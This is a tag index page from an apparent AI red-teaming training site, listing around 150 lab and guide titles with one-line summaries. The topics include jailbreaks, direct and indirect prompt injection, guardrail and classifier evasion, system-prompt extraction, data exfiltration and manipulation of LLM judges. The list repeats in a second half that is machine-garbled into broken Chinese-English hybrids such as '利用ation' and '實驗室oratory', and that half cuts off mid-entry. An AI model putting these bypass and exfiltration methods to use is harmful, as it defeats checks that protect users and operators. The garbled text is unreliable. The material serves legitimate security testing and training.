# intermediate
標記為「intermediate」的 310 篇文章
Intermediate Certification Prep Guide
Comprehensive study guide for intermediate-level certification preparation.
Capstone: Compliance Assessment Simulation
Conduct a simulated compliance assessment against EU AI Act, NIST AI RMF, and ISO 42001, producing a comprehensive gap analysis report.
Capstone: Red Team Program Design
Design a complete AI red team program for a fictional enterprise, producing a comprehensive program charter document.
Capstone: Industry Vertical Deep Dive
Select an industry vertical, threat model the AI systems within it, and produce a sector-specific AI security testing guide.
LLM Guard and Protect AI Guardian
Input/output scanning, PII detection, toxicity filtering, integration patterns, and bypass techniques for LLM Guard and the Protect AI Guardian ecosystem.
NVIDIA NeMo Guardrails
Architecture, configuration, Colang programming, integration patterns, and bypass techniques for NVIDIA's open-source NeMo Guardrails framework.
AI Anomaly Detection
Detecting jailbreak attempts, unusual usage patterns, output drift, and embedding space anomalies in AI systems through statistical and ML-based methods.
AI Monitoring and Observability
What to monitor in AI systems, key metrics for detecting abuse and drift, alerting strategies, and observability architecture for LLM applications.
AI Logging Architecture
What to capture in AI system logs — prompts, completions, latency, tokens, tool calls — along with storage strategies, retention policies, and privacy considerations.
Adversarial ML: Core Concepts
History and fundamentals of adversarial machine learning — perturbation attacks, evasion vs poisoning, robustness — bridging classical adversarial ML to LLM-specific attacks.
AI Threat Models: White-box, Black-box & Grey-box
Access levels in AI security testing — what's possible at each level, realistic scenarios, and comparison to traditional security threat modeling.
Embeddings & Vector Spaces for Red Teamers
Understand how embeddings encode semantic meaning, how vector operations work, and why red teamers need to understand embedding spaces for RAG attacks and similarity exploitation.
Lab: Exploring Embedding Spaces
Hands-on lab using Python to visualize embedding spaces, measure semantic similarity, and demonstrate how adversarial documents can be crafted to match target queries.
RAG Architecture: How Retrieval Systems Work
End-to-end anatomy of a Retrieval-Augmented Generation pipeline — document ingestion, chunking, embedding, indexing, retrieval, context assembly, and generation — with attack surface analysis at each stage.
Semantic Similarity & Vector Search Attacks
How cosine similarity and nearest neighbor search work, and how attackers exploit vector databases through adversarial documents, embedding collisions, and threshold bypasses.
Inference: Sampling, Temperature & Generation
How LLMs generate text at inference time — greedy decoding, top-k, top-p, temperature — and how these parameters affect attack success rates.
Tokenization & Its Security Implications
How BPE and SentencePiece tokenizers work, and how tokenizer behavior creates exploitable attack surfaces including boundary attacks, homoglyphs, and encoding tricks.
Pre-training → Fine-tuning → RLHF Pipeline
Understand the three stages of creating an aligned LLM — pre-training, supervised fine-tuning, and RLHF/DPO — and the security implications at each stage.
Transformer Architecture for Attackers
Deep dive into the transformer architecture — attention, feed-forward layers, and residual connections — through the lens of which components are exploitable.
Agent Architectures & Tool Use Patterns
How ReAct, Plan-and-Execute, and LangGraph agent patterns work — tool definition, invocation, and result processing — and where injection happens in each architecture.
Common AI Deployment Patterns & Attack Surfaces
Analysis of deployment patterns — chatbots, copilots, autonomous agents, batch processing, and fine-tuned models — with their unique attack surfaces and security considerations.
Lab: Mapping an AI System's Attack Surface
Hands-on lab walking through reconnaissance of an AI system — identifying components, mapping data flows, enumerating tools, and documenting the attack surface.
CTF: Code Gen Exploit
Manipulate AI code generation to produce vulnerable, backdoored, or malicious code. Explore how prompt manipulation influences code security, from subtle vulnerability injection to full backdoor insertion.
CTF: RAG Heist
Extract sensitive information from a Retrieval-Augmented Generation system by exploiting retrieval mechanisms, document parsing, embedding manipulation, and context window management vulnerabilities.
Intermediate AI Red Team Labs
Overview of intermediate-level hands-on labs covering agent exploitation, RAG poisoning, multi-turn attacks, automated campaigns, and advanced injection techniques for AI red teaming.
Advanced Encoding Chain Attacks
Chain multiple encoding schemes to bypass multi-layer input filters in production LLM applications.
Lab: Advanced Function Calling Exploitation
Exploit advanced function calling patterns including nested calls, parallel execution, and schema manipulation.
Lab: Automated Adversarial Prompt Generation
Build automated systems for generating adversarial prompts using mutation, crossover, and selection strategies.
Agent Memory Manipulation
Exploit persistent memory in LLM agents to plant false context that persists across sessions.
Lab: Agent Prompt Leaking
Hands-on lab for extracting system prompts from tool-using AI agents by exploiting tool interactions, observation channels, and multi-step reasoning to leak protected instructions.
Lab: Agent Workflow Security Testing
Test multi-step agent workflows for injection points, state manipulation, and unauthorized action execution.
API Abuse Pattern Lab
Discover and exploit API abuse patterns including parameter injection, header manipulation, and endpoint confusion.
API Parameter Fuzzing for LLMs
Systematically fuzz LLM API parameters to discover unexpected behaviors and bypasses.
Lab: API Versioning Security Gaps
Exploit version differences in LLM APIs to find deprecated endpoints and backward-compatible safety bypasses.
Lab: Automated Red Team Pipeline
Hands-on lab for building a continuous AI red team testing pipeline using promptfoo, GitHub Actions, and automated attack generation to catch safety regressions before deployment.
Lab: Automated Red Team Testing
Set up promptfoo for continuous automated security testing of AI applications, with custom evaluators and CI/CD integration.
Lab: Canary Token Effectiveness Testing
Deploy and test canary tokens in system prompts to evaluate their effectiveness at detecting prompt extraction.
Lab: Chain-of-Thought Exploitation
Exploit chain-of-thought reasoning to leak internal model reasoning, bypass safety filters, and manipulate decision processes.
Lab: CI/CD Pipeline Security for LLM Apps
Test CI/CD pipeline security for LLM applications including prompt template injection, model artifact tampering, and deployment attacks.
Lab: Advanced Classifier Evasion
Evade advanced input classifiers using adversarial perturbation, semantic paraphrasing, and gradient-free optimization.
ML Classifier Evasion Lab
Develop payloads that evade machine learning-based input classifiers through adversarial text perturbation.
Lab: Cloud AI Platform Security Testing
Test cloud AI platform configurations including AWS Bedrock guardrails, Azure content filters, and GCP safety settings.
Lab: Code Generation Security Testing
Test LLM code generation for insecure patterns, injection vulnerabilities, and code execution safety issues.
Lab: AI Compliance Testing Fundamentals
Test LLM applications against OWASP LLM Top 10 and NIST AI RMF requirements using structured test procedures.
Lab: Context Window Attack Optimization
Optimize prompt injection placement within the context window to maximize attack effectiveness using attention dynamics.
Context Window Poisoning Lab
Exploit context window management to inject persistent adversarial content that influences future model responses.
Conversation Splitting Attack Lab
Split adversarial payloads across multiple conversation turns to bypass per-message safety classification.
Conversation State Poisoning
Exploit conversation history manipulation to alter model behavior across turns.
Cross-Context Injection
Inject prompts that persist across separate conversation contexts in shared deployments.
Custom Jailbreak Wordlist Generation
Generate targeted jailbreak wordlists using mutation strategies and seed prompts.
Lab: Data Exfiltration Channels
Hands-on lab for extracting data from AI systems through markdown image rendering, invisible links, tool call parameters, and other covert exfiltration channels.
Lab: Data Exfiltration Channels (Intermediate Lab)
Extract sensitive information from AI systems through various exfiltration channels including crafted links, image tags, tool calls, and side-channel leakage.
Data Exfiltration via Side Channels
Extract data from LLM systems using timing, token probability, and formatting side channels.
Building Defense Bypass Chains
Combine multiple bypass techniques into reliable chains that defeat layered defenses.
Lab: Defense Effectiveness Measurement
Hands-on lab for quantifying AI guardrail robustness using attack success rates, evasion metrics, false positive rates, and statistical analysis of defense performance.
Lab: Defense Regression Testing Setup
Build a regression testing framework to continuously verify that LLM defenses remain effective against known attack patterns.
Lab: Defense Effectiveness Testing
Systematically test and measure the robustness of AI guardrails using structured methodology, metrics, and repeatable test suites.
Document-Based RAG Injection Lab
Inject adversarial content into documents that will be processed by a RAG system to influence model responses.
Lab: Advanced Embedding Manipulation
Manipulate embedding vectors to achieve target similarity scores for RAG poisoning and retrieval manipulation.
Practical Embedding Manipulation
Manipulate text to achieve target embedding similarities for poisoning retrieval augmented generation systems.
Embedding Similarity Attacks
Manipulate text to achieve target embedding similarity scores for retrieval poisoning.
Lab: Encoding Bypass Lab
Hands-on lab for systematically testing Base64, ROT13, Unicode homoglyph, hexadecimal, and combined encoding bypasses against LLM safety filters with measured success rates.
Fine-Tuning API Security Probing
Probe fine-tuning APIs for security weaknesses including insufficient validation and unsafe default configurations.
Lab: Fine-Tuning Safety Impact Testing
Measure how fine-tuning affects model safety by comparing pre and post fine-tuning safety benchmark scores.
Lab: Guardrail Bypass Technique Laboratory
Practice guardrail bypass techniques against NeMo Guardrails, LLM Guard, and custom classifier-based defenses.
Guardrail Fingerprinting
Systematically map the rules and thresholds of input/output guardrail systems.
Guardrail Rule Extraction Lab
Systematically extract the rules and decision boundaries of guardrail systems through targeted probing.
Lab: Exploiting LLM Hallucinations
Exploit hallucination tendencies to trigger fabricated tool calls, invented API endpoints, and false fact injection.
Lab: AI Incident Response Simulation
Practice AI incident response procedures through a simulated prompt injection incident with escalation and containment.
Lab: Indirect Prompt Injection
Inject instructions through external data sources including documents, web pages, and emails that a target AI system processes as context.
Indirect Injection via Web Content
Plant prompt injection payloads in web pages consumed by RAG-enabled LLM applications.
Lab: Instruction Following Measurement
Quantitatively measure instruction following compliance to identify where models prioritize competing instructions.
LLM Judge Manipulation
Craft responses that exploit LLM-as-judge evaluation patterns to achieve high safety scores while embedding harmful content.
Lab: Log Probability Analysis for Attacks
Use token log probabilities to extract information about training data, system prompts, and model internals.
Lab: Advanced MCP Protocol Testing
Perform advanced security testing of MCP servers including transport analysis, capability enumeration, and tool poisoning.
MCP Tool Poisoning Attack
Exploit MCP tool descriptions to inject instructions that redirect agent behavior.
Lab: Model Context Protocol Fuzzing
Fuzz MCP protocol messages to discover parsing errors, validation gaps, and unexpected behavior in MCP servers.
Practical Model Fingerprinting Lab
Fingerprint the underlying model behind an API endpoint to identify its type, version, and configuration.
Lab: LLM Security Monitoring Setup
Deploy a comprehensive security monitoring system for LLM applications with anomaly detection and alerting.
Lab: Multi-Agent Communication Testing
Test security of inter-agent communication in multi-agent systems including message injection and trust boundary violations.
Multi-Language Safety Bypass Lab
Exploit gaps in safety training coverage across languages to bypass safety mechanisms using code-switching.
Multi-Language Injection Attacks
Exploit language switching and low-resource language gaps to bypass safety training.
Multi-Model Attack Chaining
Chain attacks across multiple LLM models in a pipeline to bypass per-model defenses.
Lab: Multi-Model Comparison Security Testing
Compare security postures across multiple LLM providers by running identical attack suites and analyzing differential responses.
Multi-Model Pipeline Attack Lab
Attack a pipeline where multiple models process data sequentially, exploiting trust between pipeline stages.
Lab: Multi-Turn State Tracking Attacks
Exploit conversation state tracking to build persistent attack context across multiple conversation turns.
Lab: Multimodal Injection
Hands-on lab for embedding text instructions in images to exploit vision-enabled LLMs. Learn to craft visual prompt injections, test OCR-based attacks, and evaluate multimodal safety boundaries.
Lab: Multimodal Injection (Intermediate Lab)
Embed prompt injection instructions in images for vision-enabled models, testing how visual content can carry adversarial payloads.
Lab: Intermediate Multimodal Security Testing
Test multimodal LLMs with crafted images containing embedded text, adversarial perturbations, and visual injection payloads.
Output Channel Discovery Lab
Discover alternative output channels in LLM applications that bypass standard output filtering.
Lab: Output Schema Exploitation
Exploit structured output schemas to force models into revealing information through required field population.
Lab: Prompt Caching Side-Channel Attacks
Exploit prompt caching mechanisms to detect cached prompts and extract information through timing side channels.
Prompt Leakage Technique Lab
Practice multiple system prompt extraction techniques and measure their effectiveness across different targets.
Automated Red Teaming with PyRIT
Use Microsoft's PyRIT framework to run automated multi-turn attack campaigns.
Lab: Advanced RAG Security Testing
Test RAG systems for chunking exploitation, reranking manipulation, and cross-document injection attacks.
RAG Context Poisoning
Poison a vector database to inject adversarial content into RAG retrieval results.
Reasoning Chain Hijacking
Hijack the model's chain-of-thought reasoning to redirect its conclusions toward attacker-controlled objectives.
Lab: Role Hierarchy Exploitation
Exploit multi-role LLM architectures by manipulating the instruction hierarchy between system, user, and assistant roles.
Lab: Safety Filter Benchmarking
Benchmark safety filters across providers using standardized test suites to compare detection rates and false positives.
Semantic Deception Crafting Lab
Craft semantically coherent prompts that conceal adversarial intent from both human reviewers and ML classifiers.
Semantic Injection Crafting
Craft semantically coherent injections that evade both classifiers and human review.
Lab: Semantic Search Manipulation
Manipulate semantic search results by crafting documents that achieve target similarity scores against specific queries.
Lab: Session Isolation Testing
Test session isolation in multi-tenant LLM deployments to detect cross-session data leakage and context contamination.
Session State Exploitation Lab
Exploit session management vulnerabilities in LLM applications to access other users data or escalate privileges.
Lab: Streaming Response Manipulation
Exploit streaming response mechanisms to bypass output filters that only check complete responses.
Structured Output Safety Bypass
Use JSON mode and structured output constraints to extract information that would be refused in free-form responses.
Structured Output Exploitation
Exploit JSON mode and structured output constraints to bypass safety filters.
Lab: Supply Chain Audit
Audit an ML project's dependencies for vulnerabilities, covering model files, Python packages, container images, and training data provenance.
Lab: ML Supply Chain Scan
Hands-on lab for auditing machine learning model dependencies, detecting malicious packages in ML pipelines, and scanning model files for backdoors and supply chain threats.
Lab: System Prompt Reconstruction (Intermediate Lab)
Reconstruct full system prompts through iterative partial extraction and cross-referencing multiple leakage vectors.
Advanced Token Smuggling
Use Unicode homoglyphs, zero-width characters, and tokenizer quirks to smuggle payloads.
Lab: Tool Result Injection Attacks
Inject adversarial content through tool call results to poison model reasoning and redirect subsequent actions.
Lab: Unicode Normalization Bypass Attacks
Exploit Unicode normalization differences between input validation and model processing to smuggle injection payloads.
Lab: Vector Database Access Control Testing
Test vector database access controls for bypass vulnerabilities including namespace traversal and filter manipulation.
Agent Goal Hijacking
Redirect an AI agent's objectives through carefully crafted inputs that override its primary task.
Assistant Prefill Injection Attacks
Exploit assistant message prefilling to prime model responses and bypass safety alignment.
Chat History Manipulation Attacks
Inject false messages into conversation history to alter model behavior in subsequent turns.
Input Classifier Boundary Mapping
Systematically probe input classifiers to map their decision boundaries and find bypass regions.
Context Window Boundary Exploitation
Exploit the boundaries of context windows to push safety instructions beyond the model's attention.
Crescendo Attack Implementation
Implement Microsoft's Crescendo multi-turn escalation attack with automated conversation management.
Cross-Plugin Exploitation Chaining
Chain exploits across multiple plugins/tools in an agent system to achieve multi-step attacks.
Function Schema Manipulation
Exploit function calling schemas to inject instructions through parameter descriptions and enums.
Building Custom Garak Probes
Develop custom probe modules for NVIDIA Garak to test organization-specific vulnerability patterns.
Guardrail Latency-Based Detection
Use timing side channels to identify and characterize guardrail implementations in LLM applications.
Custom Inspect AI Safety Evaluations
Build custom safety evaluation tasks in Inspect AI to test application-specific vulnerability classes.
JailbreakBench Comparative Testing
Run standardized jailbreak benchmarks across multiple models and compare vulnerability profiles.
JSON Mode Safety Bypass
Exploit structured JSON output modes to bypass safety filters that only check plain-text responses.
LLM Guard Evasion Techniques
Develop evasion techniques against LLM Guard input scanners and output detectors.
Implementing Many-Shot Jailbreaking
Implement Anthropic's many-shot jailbreaking technique with scaling analysis across conversation lengths.
MCP Resource Data Exfiltration (Intermediate Lab)
Exploit MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.
Multi-Language Safety Gap Exploitation
Systematically identify and exploit safety training gaps across low-resource languages.
Multi-Turn State Tracking Exploitation
Exploit state management in multi-turn conversations to gradually shift model behavior over many turns.
NeMo Guardrails Bypass Techniques
Test and bypass NVIDIA NeMo Guardrails configurations using known evasion techniques.
Output Filter Bypass via Encoding
Bypass output safety filters by instructing the model to encode responses in Base64, hex, or custom schemes.
PDF Document Injection for RAG Systems
Craft adversarial PDF documents that inject instructions when processed by RAG document loaders.
Prompt Template Variable Injection
Inject adversarial content through template variable expansion in prompt management systems.
PyRIT Custom Attack Strategies
Build custom attack strategies and converters in Microsoft's PyRIT framework for targeted campaigns.
RAG Document Injection Campaign
Design and execute a document injection campaign against a RAG-powered application with vector search.
Semantic Search Poisoning
Craft adversarial documents that rank highly in semantic search for targeted queries in RAG systems.
Streaming Response Exfiltration
Exploit streaming API responses to exfiltrate data that might be caught by batch output filters.
System Prompt Extraction via Token Probabilities
Exploit token probability APIs to reconstruct hidden system prompts character by character.
Token Boundary Manipulation
Exploit tokenizer-specific behavior by crafting inputs that split across token boundaries in unexpected ways.
Tool Result Injection Attacks
Craft malicious tool return values that inject instructions back into the model's reasoning chain.
Injecting Text via Images to VLMs
Embed adversarial text in images that vision-language models read and follow as instructions.
Lab: Data Exfiltration via Webhooks
Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.
Simulation: Startup AI Assessment
Red team a startup's AI-powered product with limited scope and budget, making pragmatic tradeoffs between thoroughness and time constraints.
Code Injection via Markdown
Injecting executable payloads through markdown rendering in LLM outputs, exploiting the gap between text generation and content rendering in web-based LLM interfaces.
Context Window Stuffing
Techniques for filling the LLM context window to push system instructions out of active memory, manipulating token budgets to dilute or displace defensive prompts.
Delimiter Escape Attacks
Techniques for escaping delimiters used to separate system and user content in LLM applications, breaking out of sandboxed input regions to inject instructions.
Encoding-Based Evasion
Using base64, ROT13, hexadecimal, Unicode, and other encoding schemes to evade input detection systems and bypass content filters in LLM applications.
Few-Shot Injection
Using crafted few-shot examples within user input to steer LLM behavior toward unintended outputs, exploiting in-context learning to override safety training.
Payload Obfuscation Techniques
Methods for disguising prompt injection payloads through encoding, splitting, substitution, and other obfuscation techniques to bypass input filters and detection systems.
Role-Play Injection
Using fictional scenarios, character role-play, and narrative framing to bypass LLM safety filters by having the model operate within a permissive fictional context.
Translation Injection
Using translation requests and low-resource languages to bypass content filters, exploiting the uneven distribution of safety training across languages.
Virtual Persona Creation
Creating persistent alternate personas within LLM conversations to bypass safety training, establishing character identities that override the model's default behavioral constraints.
中階 Certification Prep 指南
Comprehensive study guide for intermediate-level certification preparation.
Capstone: Compliance 評量 Simulation
Conduct a simulated compliance assessment against EU AI Act, NIST AI RMF, and ISO 42001, producing a comprehensive gap analysis report.
Capstone: 紅隊 Program Design
Design a complete AI red team program for a fictional enterprise, producing a comprehensive program charter document.
Capstone: Industry Vertical Deep Dive
Select an industry vertical, threat model the AI systems within it, and produce a sector-specific AI security testing guide.
LLM Guard and Protect AI Guardian
Input/output scanning, PII detection, toxicity filtering, integration patterns, and bypass techniques for LLM Guard and the Protect AI Guardian ecosystem.
NVIDIA NeMo Guardrails
NVIDIA 之開源 NeMo Guardrails 框架之架構、組態、Colang 程式設計、整合模式與繞過技術。
AI Anomaly Detection
Detecting jailbreak attempts, unusual usage patterns, output drift, and embedding space anomalies in AI systems through statistical and ML-based methods.
AI 監控與可觀測性
於 AI 系統監控什麼、為偵測濫用與漂移之關鍵指標、警報策略,與 LLM 應用之可觀測性架構。
AI Logging Architecture
What to capture in AI system logs — prompts, completions, latency, tokens, tool calls — along with storage strategies, retention policies, and privacy considerations.
對抗式 ML:核心概念
對抗式機器學習的歷史與基本原理——擾動攻擊、逃避與投毒、穩健性——將古典對抗式 ML 銜接至 LLM 特有攻擊。
AI Threat 模型s: White-box, Black-box & Grey-box
Access levels in AI security testing — what's possible at each level, realistic scenarios, and comparison to traditional security threat modeling.
給紅隊員的嵌入向量與向量空間
理解嵌入向量如何編碼語意意義、向量運算如何運作,以及為何紅隊員需要理解嵌入空間以進行 RAG 攻擊與相似性利用。
實作:探索 Embedding 空間
使用 Python 視覺化 embedding 空間、量測語意相似度,並展示如何打造與目標查詢匹配之對抗文件之實作。
RAG 架構:檢索系統如何運作
檢索增強生成管線之端到端解剖——文件攝入、分塊、embedding、索引、檢索、脈絡組裝與生成——含各階段之攻擊面分析。
語意相似度與向量搜尋攻擊
Cosine 相似度與最近鄰搜尋之運作方式,以及攻擊者如何經由對抗文件、embedding 碰撞與門檻繞過利用向量資料庫。
推論:取樣、Temperature 與生成
LLM 如何在推論期生成文字——greedy decoding、top-k、top-p、temperature——以及這些參數如何影響攻擊成功率。
Tokenization & Its 安全 Implications
How BPE and SentencePiece tokenizers work, and how tokenizer behavior creates exploitable attack surfaces including boundary attacks, homoglyphs, and encoding tricks.
預訓練 → 微調 → RLHF 管線
瞭解打造對齊 LLM 的三階段流程——預訓練、監督式微調、RLHF/DPO——以及各階段的安全意涵。
Transformer Architecture for 攻擊ers
Deep dive into the transformer architecture — attention, feed-forward layers, and residual connections — through the lens of which components are exploitable.
代理架構與工具使用模式
ReAct、Plan-and-Execute 與 LangGraph 代理模式如何運作——工具定義、呼叫與結果處理——以及注入於每個架構中發生之處。
常見 AI 部署模式與攻擊面
部署模式之分析——聊天機器人、copilot、自主代理、批次處理與微調模型——及其獨特之攻擊面與安全考量。
實作:繪製 AI 系統的攻擊面
對 AI 系統進行偵察的實作課程——辨識元件、繪製資料流、枚舉工具,並撰寫攻擊面文件。
CTF:程式碼生成攻擊
操弄 AI 程式碼生成使其產出有漏洞、含後門或惡意的程式碼。從細微的漏洞注入到完整後門植入,探索提示操弄如何影響程式碼安全。
CTF:RAG 劫案
透過利用檢索機制、文件解析、嵌入操弄與上下文視窗管理漏洞,從檢索增強生成(RAG)系統中擷取敏感資訊。
中階 AI 紅隊實驗室
構成專業 AI 紅隊演練骨幹的核心攻擊技術實驗室——防禦繞過、代理利用、RAG 投毒與更多。
進階 Encoding Chain 攻擊s
Chain multiple encoding schemes to bypass multi-layer input filters in production LLM applications.
實驗室: 進階 Function Calling 利用ation
利用 advanced function calling patterns including nested calls, parallel execution, and schema manipulation.
實驗室: Automated Adversarial Prompt Generation
Build automated systems for generating adversarial prompts using mutation, crossover, and selection strategies.
代理 記憶體 Manipulation
利用 persistent memory in LLM agents to plant false context that persists across sessions.
實驗室: 代理 Prompt Leaking
Hands-on lab for extracting system prompts from tool-using AI agents by exploiting tool interactions, observation channels, and multi-step reasoning to leak protected instructions.
實驗室: 代理 Workflow 安全 Testing
Test multi-step agent workflows for injection points, state manipulation, and unauthorized action execution.
API Abuse Pattern 實驗室
Discover and exploit API abuse patterns including parameter injection, header manipulation, and endpoint confusion.
API Parameter Fuzzing for LLMs
Systematically fuzz LLM API parameters to discover unexpected behaviors and bypasses.
實驗室: API Versioning 安全 Gaps
利用 version differences in LLM APIs to find deprecated endpoints and backward-compatible safety bypasses.
實驗室: Automated 紅隊 Pipeline
Hands-on lab for building a continuous AI red team testing pipeline using promptfoo, GitHub Actions, and automated attack generation to catch safety regressions before deployment.
實驗室: Automated 紅隊 Testing
Set up promptfoo for continuous automated security testing of AI applications, with custom evaluators and CI/CD integration.
實驗室: Canary Token Effectiveness Testing
Deploy and test canary tokens in system prompts to evaluate their effectiveness at detecting prompt extraction.
實驗室: Chain-of-Thought 利用ation
利用 chain-of-thought reasoning to leak internal model reasoning, bypass safety filters, and manipulate decision processes.
實驗室: CI/CD Pipeline 安全 for LLM Apps
Test CI/CD pipeline security for LLM applications including prompt template injection, model artifact tampering, and deployment attacks.
實驗室: 進階 Classifier Evasion
Evade advanced input classifiers using adversarial perturbation, semantic paraphrasing, and gradient-free optimization.
ML Classifier Evasion 實驗室
Develop payloads that evade machine learning-based input classifiers through adversarial text perturbation.
實驗室: Cloud AI Platform 安全 Testing
Test cloud AI platform configurations including AWS Bedrock guardrails, Azure content filters, and GCP safety settings.
實驗室: Code Generation 安全 Testing
Test LLM code generation for insecure patterns, injection vulnerabilities, and code execution safety issues.
實驗室: AI Compliance Testing 基礎
Test LLM applications against OWASP LLM Top 10 and NIST AI RMF requirements using structured test procedures.
實驗室: Context Window 攻擊 Optimization
Optimize prompt injection placement within the context window to maximize attack effectiveness using attention dynamics.
Context Window 投毒 實驗室
利用 context window management to inject persistent adversarial content that influences future model responses.
Conversation Splitting 攻擊 實驗室
Split adversarial payloads across multiple conversation turns to bypass per-message safety classification.
Conversation State 投毒
利用 conversation history manipulation to alter model behavior across turns.
Cross-Context Injection
Inject prompts that persist across separate conversation contexts in shared deployments.
Custom 越獄 Wordlist Generation
Generate targeted jailbreak wordlists using mutation strategies and seed prompts.
實驗室: Data Exfiltration Channels
Hands-on lab for extracting data from AI systems through markdown image rendering, invisible links, tool call parameters, and other covert exfiltration channels.
實驗室: Data Exfiltration Channels (中階 實驗室)
Extract sensitive information from AI systems through various exfiltration channels including crafted links, image tags, tool calls, and side-channel leakage.
Data Exfiltration via Side Channels
Extract data from LLM systems using timing, token probability, and formatting side channels.
Building 防禦 Bypass Chains
Combine multiple bypass techniques into reliable chains that defeat layered defenses.
實驗室: 防禦 Effectiveness Measurement
Hands-on lab for quantifying AI guardrail robustness using attack success rates, evasion metrics, false positive rates, and statistical analysis of defense performance.
實驗室: 防禦 Regression Testing Setup
Build a regression testing framework to continuously verify that LLM defenses remain effective against known attack patterns.
實驗室: 防禦 Effectiveness Testing
Systematically test and measure the robustness of AI guardrails using structured methodology, metrics, and repeatable test suites.
Document-Based RAG Injection 實驗室
Inject adversarial content into documents that will be processed by a RAG system to influence model responses.
實驗室: 進階 Embedding Manipulation
Manipulate embedding vectors to achieve target similarity scores for RAG poisoning and retrieval manipulation.
Practical Embedding Manipulation
Manipulate text to achieve target embedding similarities for poisoning retrieval augmented generation systems.
Embedding Similarity 攻擊s
Manipulate text to achieve target embedding similarity scores for retrieval poisoning.
實驗室: Encoding Bypass 實驗室
Hands-on lab for systematically testing Base64, ROT13, Unicode homoglyph, hexadecimal, and combined encoding bypasses against LLM safety filters with measured success rates.
Fine-Tuning API 安全 Probing
Probe fine-tuning APIs for security weaknesses including insufficient validation and unsafe default configurations.
實驗室: Fine-Tuning Safety Impact Testing
Measure how fine-tuning affects model safety by comparing pre and post fine-tuning safety benchmark scores.
實驗室: Guardrail Bypass Technique 實驗室oratory
Practice guardrail bypass techniques against NeMo Guardrails, LLM Guard, and custom classifier-based defenses.
Guardrail Fingerprinting
Systematically map the rules and thresholds of input/output guardrail systems.
Guardrail Rule Extraction 實驗室
Systematically extract the rules and decision boundaries of guardrail systems through targeted probing.
實驗室: 利用ing LLM Hallucinations
利用 hallucination tendencies to trigger fabricated tool calls, invented API endpoints, and false fact injection.
實驗室: AI Incident Response Simulation
Practice AI incident response procedures through a simulated prompt injection incident with escalation and containment.
實驗室: Indirect 提示詞注入
Inject instructions through external data sources including documents, web pages, and emails that a target AI system processes as context.
Indirect Injection via Web Content
Plant prompt injection payloads in web pages consumed by RAG-enabled LLM applications.
實驗室: Instruction Following Measurement
Quantitatively measure instruction following compliance to identify where models prioritize competing instructions.
LLM Judge Manipulation
Craft responses that exploit LLM-as-judge evaluation patterns to achieve high safety scores while embedding harmful content.
實驗室: Log Probability Analysis for 攻擊s
Use token log probabilities to extract information about training data, system prompts, and model internals.
實驗室: 進階 MCP Protocol Testing
Perform advanced security testing of MCP servers including transport analysis, capability enumeration, and tool poisoning.
MCP 工具 投毒 攻擊
利用 MCP tool descriptions to inject instructions that redirect agent behavior.
實驗室: 模型 Context Protocol Fuzzing
Fuzz MCP protocol messages to discover parsing errors, validation gaps, and unexpected behavior in MCP servers.
Practical 模型 Fingerprinting 實驗室
Fingerprint the underlying model behind an API endpoint to identify its type, version, and configuration.
實驗室: LLM 安全 Monitoring Setup
Deploy a comprehensive security monitoring system for LLM applications with anomaly detection and alerting.
實驗室: Multi-代理 Communication Testing
Test security of inter-agent communication in multi-agent systems including message injection and trust boundary violations.
Multi-Language Safety Bypass 實驗室
利用 gaps in safety training coverage across languages to bypass safety mechanisms using code-switching.
Multi-Language Injection 攻擊s
利用 language switching and low-resource language gaps to bypass safety training.
Multi-模型 攻擊 Chaining
Chain attacks across multiple LLM models in a pipeline to bypass per-model defenses.
實驗室: Multi-模型 Comparison 安全 Testing
Compare security postures across multiple LLM providers by running identical attack suites and analyzing differential responses.
Multi-模型 Pipeline 攻擊 實驗室
攻擊 a pipeline where multiple models process data sequentially, exploiting trust between pipeline stages.
實驗室: Multi-Turn State Tracking 攻擊s
利用 conversation state tracking to build persistent attack context across multiple conversation turns.
實驗室: Multimodal Injection
Hands-on lab for embedding text instructions in images to exploit vision-enabled LLMs. Learn to craft visual prompt injections, test OCR-based attacks, and evaluate multimodal safety boundaries.
實驗室: Multimodal Injection (中階 實驗室)
Embed prompt injection instructions in images for vision-enabled models, testing how visual content can carry adversarial payloads.
實驗室: 中階 Multimodal 安全 Testing
Test multimodal LLMs with crafted images containing embedded text, adversarial perturbations, and visual injection payloads.
Output Channel Discovery 實驗室
Discover alternative output channels in LLM applications that bypass standard output filtering.
實驗室: Output Schema 利用ation
利用 structured output schemas to force models into revealing information through required field population.
實驗室: Prompt Caching Side-Channel 攻擊s
利用 prompt caching mechanisms to detect cached prompts and extract information through timing side channels.
Prompt Leakage Technique 實驗室
Practice multiple system prompt extraction techniques and measure their effectiveness across different targets.
Automated 紅隊演練 with PyRIT
Use Microsoft's PyRIT framework to run automated multi-turn attack campaigns.
實驗室: 進階 RAG 安全 Testing
Test RAG systems for chunking exploitation, reranking manipulation, and cross-document injection attacks.
RAG Context 投毒
Poison a vector database to inject adversarial content into RAG retrieval results.
Reasoning Chain Hijacking
Hijack the model's chain-of-thought reasoning to redirect its conclusions toward attacker-controlled objectives.
實驗室: Role Hierarchy 利用ation
利用 multi-role LLM architectures by manipulating the instruction hierarchy between system, user, and assistant roles.
實驗室: Safety Filter Benchmarking
Benchmark safety filters across providers using standardized test suites to compare detection rates and false positives.
Semantic Deception Crafting 實驗室
Craft semantically coherent prompts that conceal adversarial intent from both human reviewers and ML classifiers.
Semantic Injection Crafting
Craft semantically coherent injections that evade both classifiers and human review.
實驗室: Semantic Search Manipulation
Manipulate semantic search results by crafting documents that achieve target similarity scores against specific queries.
實驗室: Session Isolation Testing
Test session isolation in multi-tenant LLM deployments to detect cross-session data leakage and context contamination.
Session State 利用ation 實驗室
利用 session management vulnerabilities in LLM applications to access other users data or escalate privileges.
實驗室: Streaming Response Manipulation
利用 streaming response mechanisms to bypass output filters that only check complete responses.
Structured Output Safety Bypass
Use JSON mode and structured output constraints to extract information that would be refused in free-form responses.
Structured Output 利用ation
利用 JSON mode and structured output constraints to bypass safety filters.
實驗室: Supply Chain Audit
Audit an ML project's dependencies for vulnerabilities, covering model files, Python packages, container images, and training data provenance.
實驗室: ML Supply Chain Scan
Hands-on lab for auditing machine learning model dependencies, detecting malicious packages in ML pipelines, and scanning model files for backdoors and supply chain threats.
實驗室: System Prompt Reconstruction (中階 實驗室)
Reconstruct full system prompts through iterative partial extraction and cross-referencing multiple leakage vectors.
進階 Token Smuggling
Use Unicode homoglyphs, zero-width characters, and tokenizer quirks to smuggle payloads.
實驗室: 工具 Result Injection 攻擊s
Inject adversarial content through tool call results to poison model reasoning and redirect subsequent actions.
實驗室: Unicode Normalization Bypass 攻擊s
